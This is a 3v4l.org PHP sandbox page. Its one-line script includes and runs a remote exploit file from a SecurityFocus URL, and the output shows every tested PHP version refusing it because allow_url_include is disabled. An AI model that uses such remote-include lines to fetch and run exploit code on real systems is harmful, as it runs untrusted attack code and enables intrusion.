3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php include('http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php'); ?>
Output for 5.3.28 - 5.3.29, 5.4.18 - 7.1.0
Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /in/ZTOvn on line 2 Warning: include(http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php): failed to open stream: no suitable wrapper could be found in /in/ZTOvn on line 2 Warning: include(): Failed opening 'http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php' for inclusion (include_path='.:') in /in/ZTOvn on line 2
Output for 5.3.0 - 5.3.27, 5.4.0 - 5.4.17
Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /in/EObAs on line 2 Warning: include(http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php): failed to open stream: no suitable wrapper could be found in /in/EObAs on line 2 Warning: include(): Failed opening 'http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php' for inclusion (include_path='.:') in /in/EObAs on line 2